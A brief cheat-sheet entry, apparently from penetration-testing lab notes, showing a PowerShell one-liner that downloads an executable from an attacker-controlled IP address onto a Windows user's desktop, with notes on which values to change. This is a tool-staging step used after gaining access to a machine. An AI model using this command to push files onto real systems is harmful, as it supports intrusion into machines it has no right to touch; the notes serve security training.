powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.11.0.4/wget.exe','C:\\\\Users\\\\offsec\\\\Desktop\\\\wget.exe')"

http://10.11.0.4/wget.exe change with desired ip and file

C:\\Users\\offsec\\Desktop\\wget.exe locate and name of file to save